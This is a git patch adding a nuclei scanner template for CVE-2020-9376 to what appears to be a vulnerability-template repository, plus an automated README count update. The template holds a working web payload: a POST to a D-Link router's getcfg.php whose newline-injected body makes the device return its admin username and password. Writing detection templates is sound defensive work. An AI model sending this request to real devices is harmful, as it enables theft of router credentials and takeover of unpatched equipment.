From d8fc0079d96829b0759a19e791ee4b03bba4e5b0 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Tue, 12 Jan 2021 21:45:12 +0530
Subject: [PATCH 1/2] Adding CVE-2020-9376

---
 cves/2020/CVE-2020-9376.yaml | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 cves/2020/CVE-2020-9376.yaml

diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml
new file mode 100644
index 0000000000..7d671b3333
--- /dev/null
+++ b/cves/2020/CVE-2020-9376.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-9376
+
+info:
+  name: D-Link Information Disclosure via getcfg.php
+  author: whynotke
+  severity: high
+  description: |
+    D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
+    NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+
+    References:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/getcfg.php"
+
+    body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<name>Admin</name>"
+          - "</usrid>"
+          - "</password>"
+        condition: and
+        part: body

From e4018823919b2d487d229a379d9e8e97b9e054ad Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 12 Jan 2021 16:16:29 +0000
Subject: [PATCH 2/2] Auto Update README [Tue Jan 12 16:16:29 UTC 2021] :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 27571ae44f..97ea5862df 100644
--- a/README.md
+++ b/README.md
@@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves            | 154            | default-logins   | 8 |
+| cves            | 155            | default-logins   | 8 |
 | dns             | 6               | exposed-panels   | 72   |
 | exposed-tokens  | 9  | exposures        | 40      |
 | fuzzing         | 5           | helpers          | 3        |
@@ -205,6 +205,7 @@ An overview of the nuclei template directory including number of templates assoc
 │       ├── CVE-2020-8982.yaml
 │       ├── CVE-2020-9047.yaml
 │       ├── CVE-2020-9344.yaml
+│       ├── CVE-2020-9376.yaml
 │       ├── CVE-2020-9484.yaml
 │       ├── CVE-2020-9496.yaml
 │       └── CVE-2020-9757.yaml
@@ -575,7 +576,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 </details>
 
-**53 directories, 475 files**.
+**53 directories, 476 files**.
 
 📖 Documentation
 -----